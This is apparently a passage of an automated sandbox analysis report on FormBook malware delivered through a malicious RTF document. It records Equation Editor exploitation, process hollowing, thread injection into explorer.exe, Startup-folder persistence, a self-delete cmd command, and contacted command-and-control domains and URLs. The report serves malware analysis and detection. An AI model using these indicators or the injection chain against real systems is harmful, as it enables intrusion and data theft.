          Source: C:\Users\user\AppData\Roaming\skypound83892.exeMemory written: C:\Users\user\AppData\Roaming\skypound83892.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeSection loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeSection loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeSection unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: CD0000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\skypound83892.exe C:\Users\user\AppData\Roaming\skypound83892.exe
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess created: C:\Users\user\AppData\Roaming\skypound83892.exe C:\Users\user\AppData\Roaming\skypound83892.exe
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\skypound83892.exe'
          Source: explorer.exe, 00000007.00000002.2390144478.00000000006F0000.00000002.00000001.sdmp, NAPSTAT.EXE, 0000000C.00000002.2390168426.0000000000D20000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000007.00000002.2390144478.00000000006F0000.00000002.00000001.sdmp, NAPSTAT.EXE, 0000000C.00000002.2390168426.0000000000D20000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000000.2137451244.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000007.00000002.2390144478.00000000006F0000.00000002.00000001.sdmp, NAPSTAT.EXE, 0000000C.00000002.2390168426.0000000000D20000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeQueries volume information: C:\Users\user\AppData\Roaming\skypound83892.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2389888753.0000000000280000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.2299563843.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2203049931.0000000000330000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2203016993.0000000000300000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 16.2.firefos.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.firefos.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.skypound83892.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.skypound83892.exe.400000.1.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2389888753.0000000000280000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.2299563843.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2203049931.0000000000330000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2203016993.0000000000300000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 16.2.firefos.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.firefos.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.skypound83892.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.skypound83892.exe.400000.1.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Registry Run Keys / Startup Folder11Process Injection612Masquerading1OS Credential DumpingSecurity Software Discovery121Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder11Virtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer13Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol22SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 323039 Sample: VOMAXTRADING.doc Startdate: 26/11/2020 Architecture: WINDOWS Score: 100 50 www.akasyaofistasima.com 2->50 52 akasyaofistasima.com 2->52 62 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->62 64 Malicious sample detected (through community Yara rule) 2->64 66 Multi AV Scanner detection for submitted file 2->66 68 7 other signatures 2->68 11 EQNEDT32.EXE 11 2->11         started        16 WINWORD.EXE 336 20 2->16         started        18 EQNEDT32.EXE 2->18         started        signatures3 process4 dnsIp5 54 sea-shared-5.masterns.com 104.168.198.45, 49167, 80 HOSTWINDSUS United States 11->54 46 C:\Users\user\AppData\...\skypound83892.exe, PE32 11->46 dropped 48 C:\Users\user\AppData\...\skypoundx[1].exe, PE32 11->48 dropped 86 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->86 20 skypound83892.exe 2 7 11->20         started        file6 signatures7 process8 file9 44 C:\Users\user\AppData\Roaming\...\firefos.exe, PE32 20->44 dropped 70 Machine Learning detection for dropped file 20->70 72 Tries to detect virtualization through RDTSC time measurements 20->72 74 Injects a PE file into a foreign processes 20->74 24 skypound83892.exe 20->24         started        signatures10 process11 signatures12 76 Modifies the context of a thread in another process (thread injection) 24->76 78 Maps a DLL or memory area into another process 24->78 80 Sample uses process hollowing technique 24->80 82 Queues an APC in another process (thread injection) 24->82 27 explorer.exe 3 24->27 injected process13 dnsIp14 56 mycapecrusade.com 34.102.136.180, 49170, 80 GOOGLEUS United States 27->56 58 www.opel-occasions-ales.com 50.117.11.156, 49168, 80 EGIHOSTINGUS United States 27->58 60 4 other IPs or domains 27->60 84 System process connects to network (likely due to code injection or exploit) 27->84 31 NAPSTAT.EXE 27->31         started        34 firefos.exe 27->34         started        36 firefos.exe 27->36         started        signatures15 process16 signatures17 88 Modifies the context of a thread in another process (thread injection) 31->88 90 Maps a DLL or memory area into another process 31->90 92 Tries to detect virtualization through RDTSC time measurements 31->92 38 cmd.exe 31->38         started        94 Injects a PE file into a foreign processes 34->94 40 firefos.exe 34->40         started        42 firefos.exe 36->42         started        process18

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          VOMAXTRADING.doc43%VirustotalBrowse
          VOMAXTRADING.doc40%ReversingLabsDocument-RTF.Trojan.Wacatac

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\skypoundx[1].exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\skypound83892.exe100%Joe Sandbox ML

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          15.2.firefos.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          16.2.firefos.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.2.skypound83892.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.opel-occasions-ales.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.runwithit.media/bu43/?Yzrx=5vpVtqJ3i14TYLjahre3JpaYS6Wcf4IPAkG7pj5paeEEzi6lwzUZWwRsk9qYR19+9CpDRA==&OBZPd=k6AhchXHBB0%Avira URL Cloudsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%Avira URL Cloudsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.opel-occasions-ales.com/bu43/?OBZPd=k6AhchXHBB&Yzrx=UiBHsTvAEQLKMdFr/hj1g9PdhtcWl8ZZ/ysXuG6Tr8ng0KhPmhT7mwdkGkewJ6JbNyjYEA==0%Avira URL Cloudsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%Avira URL Cloudsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.opel-occasions-ales.com
          		50.117.11.156
          		truetrueunknown
          mycapecrusade.com
          		34.102.136.180
          		truetrue
            		unknown
            sea-shared-5.masterns.com
            		104.168.198.45
            		truetrue
              		unknown
              akasyaofistasima.com
              		89.252.180.207
              		truefalse
                		unknown
                ext-sq.squarespace.com
                		198.49.23.141
                		truefalse
                  		high
                  www.akasyaofistasima.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.mycapecrusade.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.musmarservices.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.runwithit.media
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://www.runwithit.media/bu43/?Yzrx=5vpVtqJ3i14TYLjahre3JpaYS6Wcf4IPAkG7pj5paeEEzi6lwzUZWwRsk9qYR19+9CpDRA==&OBZPd=k6AhchXHBBtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.opel-occasions-ales.com/bu43/?OBZPd=k6AhchXHBB&Yzrx=UiBHsTvAEQLKMdFr/hj1g9PdhtcWl8ZZ/ysXuG6Tr8ng0KhPmhT7mwdkGkewJ6JbNyjYEA==true
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://search.chol.com/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                            		high
                            http://www.mercadolivre.com.br/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://search.ebay.de/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                              		high
                              http://www.mtv.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                		high
                                http://www.rambler.ru/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                  		high
                                  http://www.nifty.com/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                    		high
                                    http://www.dailymail.co.uk/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www3.fnac.com/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                      		high
                                      https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1explorer.exe, 00000007.00000000.2179041046.000000000842E000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.2180621064.000000000861C000.00000004.00000001.sdmpfalse
                                        		high
                                        http://buscar.ya.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                          		high
                                          http://search.yahoo.com/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                            		high
                                            http://www.iis.fhg.de/audioPAexplorer.exe, 00000007.00000000.2151899014.0000000004B50000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.sogou.com/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                              		high
                                              http://asp.usatoday.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                		high
                                                http://fr.search.yahoo.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  		high
                                                  http://rover.ebay.comexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    		high
                                                    http://in.search.yahoo.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      		high
                                                      http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        		high
                                                        http://search.ebay.in/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          		high
                                                          http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://%s.comexplorer.exe, 00000007.00000000.2189757519.000000000A330000.00000008.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		low
                                                          http://msk.afisha.ru/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            		high
                                                            http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://search.rediff.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              		high
                                                              http://www.windows.com/pctv.explorer.exe, 00000007.00000000.2144811362.0000000003C40000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://www.ya.com/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://it.search.dada.net/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://search.naver.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.google.ru/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      		high
                                                                      http://search.hanafos.com/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.abril.com.br/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://search.daum.net/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        		high
                                                                        http://search.naver.com/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          		high
                                                                          http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.clarin.com/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            		high
                                                                            http://buscar.ozu.es/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://kr.search.yahoo.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              		high
                                                                              http://search.about.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                		high
                                                                                http://busca.igbusca.com.br/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2explorer.exe, 00000007.00000000.2147725228.00000000041AD000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://www.ask.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://www.priceminister.com/favicon.icoexplorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://www.cjmall.com/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://search.centrum.cz/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://suche.t-online.de/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://www.google.it/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://search.auction.co.kr/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://www.ceneo.pl/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.amazon.de/explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    		high
